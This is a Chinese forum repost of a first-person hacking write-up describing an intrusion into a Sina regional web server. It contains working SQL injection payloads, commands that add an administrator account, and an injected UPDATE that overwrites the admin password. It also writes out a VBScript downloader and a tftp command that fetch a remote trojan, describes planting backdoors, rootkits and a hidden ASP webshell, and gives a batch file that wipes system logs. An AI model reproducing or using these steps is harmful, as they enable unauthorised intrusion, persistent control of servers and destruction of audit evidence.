- 论坛徽章:
- 0
|
前段时间听说sohu的一个分站被人黑了我还看了,是真的
实战入侵新浪分站的一台服务器
[color="#ff9933"]|日期:2005-5-23 8:57:05 来源: 编辑: [color="#c0c0c0"]浏览: 861|
[color="#0066cc"]前段时间听说sohu的一个分站被人黑了我还看了,是真的。所以我也对这种门户网站动动手,我上了
www.sina.com.cn
,
又跑到了它的广东分站。东西太多了,找个注入点也很难,大多是html,shtml的页面。于是我查看源文件,搜索asp.
总算找到了一个可以asp的页面,找到了一个注入点
[color="#0000ff"]http://xxxxxx.sina.com.cn/news/newdetail.asp?id=2807
提交单引号,
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]字符串 '' 之前有未闭合的引号。
/news/newdetail.asp,行 5
提交 and 1=1 返回正常,提交and 1=2 出错。呵呵,典型的注入漏洞。
and 1=(select%20@@VERSION) 返回结果表明是sql2000的,windows2000的服务器
and 'SA'=(SELECT%20System_user),返回错误,看来不是sa帐号连接
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')
返回正常,表明xp_cmdshell存在
手工注入太麻烦,用nbsi吧,想到nbsi老发生意外出错,用教主的HDSI吧,它还支持php注入呢!结果出来了,显示连接帐号为dbo,SA权限,这下好了。因为权限比较高,所以用HDSI能够直接执行系统命令,省得在浏览器里面用xp_cmdshell执行。
如图01执行ipcongfig -all命令,看了一下ip,确定sql数据库和网站是在同一台机子上。用net start命令看了一下,
有诺顿,serv-u,sql,终端服务也开了。先加个帐户。
net user zuoai /add, net localgroup administrator zuoai /add
再执行net start telnet. 先连它的终端试试,这个我只抱着40%的希望。可喜的是能连上去,可是当我输入
帐号和密码后出现如下提示框。
图1
guest$虽然是管理员权限,却没有远程登陆的权限。
再试试telnet,这个我只抱着20%的希望,果然,出现“正在连接到211.155.23.118...无法打开到主机的连接
在端口 23 : 连接失败”,这种错误很常见,可能是由于telnet服务没有成功开启或者防火墙屏
蔽了对23端口的访问,这里应该属于前面一种情况!那就试试ipc连接吧,
,发生错误53,这种错误一般是自己的lanmanworkstation服务未启动或者目标删除了ipc$,这里应该属于前面一种情况。
现在我关键是把
[color="#0000ff"]传上去,怎么办呢?得到webshell,再上传图片,得到webshell。
用HDSI把所有的表都猜出来了,实在太多了,根本找不到管理员密码在哪个表里面。于是跨库查询,看到了一个bbs库,一个leadbbs2的库。
我立刻访问[color="#0000ff"]http://xxx.xxx.sina.com.cn/bbs
,果然是个
[color="#0000ff"],估计是他们自己开发的(后来才知道是leadbbs).
我接着猜解bbs这个库,希望把管理员密码帐号都跑出来。希望不是md5加密的,如果用md5加密了的话就只好用updata把密码改为自己的了.
再用HDSI猜后台地址,很快猜出来了,
[color="#0000ff"]http://xxx.xxx.sina.com.cn
/bbs/manage/default.asp
可是着个库里面还是没有重要东西。这个bbs应该对那个leadbbs2库,密码跑出来了,是md5加密的。
如图02
;update leadbbs2.dbo.leadbbs_User set pass='4621d373cade4e83' where username='admin';--,4621d373cade4e83是md5加密后的test.应试试帐号:admin,密码:test登陆却出现提示"此用户已经开启IP绑定访问,您无权使用此用户!".一阵狂晕,管理员登陆限制了ip!看来用这种办法得到webshell是不行了。
其实现在可以先找到web的绝对路径后在HDSI中用echo写个小马上去,可是用echo的时候有写字符要用"^"来转义,比如写个冰狐浪子服务端要这样写
echo ^try{eval^(Request.form^('guest'^)+''^)}catch^(e^){}^ >c: est.asp
但是在nbsi这样的工具的命令行中来执行很容易出错,在浏览器用;exec master.dbo.xp_cmdshell 'command'执行的时候转义更麻烦。
于是又想到一种办法,就是写个下载指定地址的
[color="#0000ff"]的脚本如下:
以下是代码片段:
echo iLocal = LCase^(WScript.Arguments^(1^)^) >c:vbs.vbs
echo iRemote = LCase^(WScript.Arguments^(0^)^) >>c:vbs.vbs
echo Set xPost = CreateObject^("Microsoft.XMLHTTP"^) >>c:vbs.vbs
echo xPost.Open "GET",iRemote,0 >>c:vbs.vbs
echo xPost.Send^(^) >>c:vbs.vbs
echo Set sGet = CreateObject^("ADODB.Stream"^) >>c:vbs.vbs
echo sGet.Mode = 3 >>c:vbs.vbs
echo sGet.Type = 1 >>c:vbs.vbs
echo sGet.Open^(^) >>c:vbs.vbs
echo sGet.Write^(xPost.responseBody^) >>c:vbs.vbs
echo sGet.SaveToFile iLocal,2 >>c:vbs.vbs
这样就写到c盘根目录的vbs.vbs文件中去了,接着用这句话执行:
c:vbs.vbs http://xxx.com/muma.exe c:hehe.exe
这个方法可是很有效的哦,不过nbsi直接在nbsi或者其它注入工具命令行执行的时候会发生异常,自己在本机测试的时候一切正常,可是在nbsi中执行的时候二句以后的每句话都会被写入两次,极为郁闷,估计是nbsi运行原理不一样吧,谁知道这个问题怎么解决希望不吝赐教哦!如果在浏览器里面用xp_cmdshell执行,不过还要考虑“%,&"等字符,这些字符在asp里面会用到,所以要使用编码。
正郁闷着,忽然想到还有最简单直接的tftp还没用呢,在HDSI的命令行里执行tftp -i myip get 3721.exe c:3721.exe,谢天谢地,我这边的tftp有反映了。
如图2
![]()
其实很多时候,即使我们得到了webdhell,用serv_u本地溢出或者sql什么的提升权限加了系统帐号,运行了
[color="#0000ff"]。由于别人的服务器搞了ip安全策略,端口映射,边界路由阻隔,防火墙拦截等等,还是会有无法控制服务器的时候。呵呵,我就曾经入侵了几个大型网站,配置很bt,一直搞到现在还没搞定它的服务器!
好了,终于传完了,在HDSI的命令行里面执行c:3721.exe,3721.exe是我自己配置好了的超级radmin服务端,注册为系统服务,端口为2046。再次感谢上帝,顺利的连上去了。马上屏幕监控看一下,好像锁定了,再用radmin直接控制,果然计算机处于锁定状态。
如图3
[/url]
[url=http://77169.org/Article/Class1/Class21/Index.html]
木马
![]()
要求按ctrl+alt+del键再登陆,可是如果我按ctrl+alt+del,只会在自己机子上运行任务管理器,不能直接控制了。现在就得留后门了,万一管理员什么时候登陆服务器,命令行下netstat -an如果发现2046端口连到我机子上也许会发现这个后门。所以赶紧装几个隐蔽点的后门,先hacker's door,再hacker defender,直接用radmin的文件管理传上去,再用radmin的远程telnet执行,最后把我的pcshare也搞上去,我比较喜欢pcshare,因为它使用的是80端口,容易突破防火墙。 用radmin在它的盘里搜索,找到了网站的根目录,在D:GZINFO下面。
如图4
![]()
还有其它的一些网页目录,也不知道是什么网站里面的,突然看到了有一个"
服务
器监视器"的
软件
,呵呵,下了readme文件,一看,"......五、网页监控 监视列表中选中的的网页是否能够打开。如果打不开除在本机上提醒外还可以发送手机短信提醒,并重启IIS
服务
。注意:修改设置时先关闭监控。
六、文件监控 监视本机上的文件,在文件发生改变时通知管理员,如果设置了备份文件,
软件
会自动使用备份文件覆盖被监视文件."好厉害的东东哦!开机自动运行,而且自动锁定计算机。
接着把自己修改后的海洋顶端
[color="#0000ff"]传上去。成功地得到了webshell。
如图5
[/url]
[url=http://77169.org/Article/Class1/Class21/Index.html]
木马
![]()
再把下面这个下马插到它地几个asp文件里面,只有访问这几个页面是在后面加上?me=Guest$时,
小马才会显现出来!比较可靠。
以下是
代码
片段:
"" then %>
save Success!" %>
Save UnSuccess!" %>
" %>
路径(如D:webx.asp):" %>
" %>
" %>
" %>
" %>
现在已经基本控制了
服务
器了,最后把所有地日志都删除了,一个批处理。
@del c:winntsystem32logfiles*.*
@del c:winntsystem32config*.evt
@del c:winntsystem32dtclog*.*
@del c:winntsystem32*.log
@del c:winntsystem32*.txt
@del c:winnt*.txt
@del c:winnt*.log
@del c:del.bat。
现在就等着管理员登陆后findpass得到密码进3389了,再渗透它的内网。因为我还没找到一个好地嗅探
软件
,所以就没有装这个。
到这里本文要结束了,其实也没有什么高深的
技术
,高手见笑了。其实入侵的时候会碰到各种各样的问题,能否解决这这些问题。是高手和菜鸟的本质区别!希望喜欢交流
技术
的朋友和我联系,我的qq是:156544632。我的站
︻◣ 黑色
网络
︻◣ http://hacker.ab8.cn/
[/url]
[url=http://77169.org/Article/Class1/Class21/Index.html]
木马
[/url]
[url=http://bbs.77169.com/]
论坛
[/url]
[url=http://77169.org/Article/Class1/Class21/Index.html]
木马
本文来自ChinaUnix博客,如果查看原文请点:http://blog.chinaunix.net/u/7702/showart_30462.html |
|
免费注册
发表于 2005-06-11 21:09
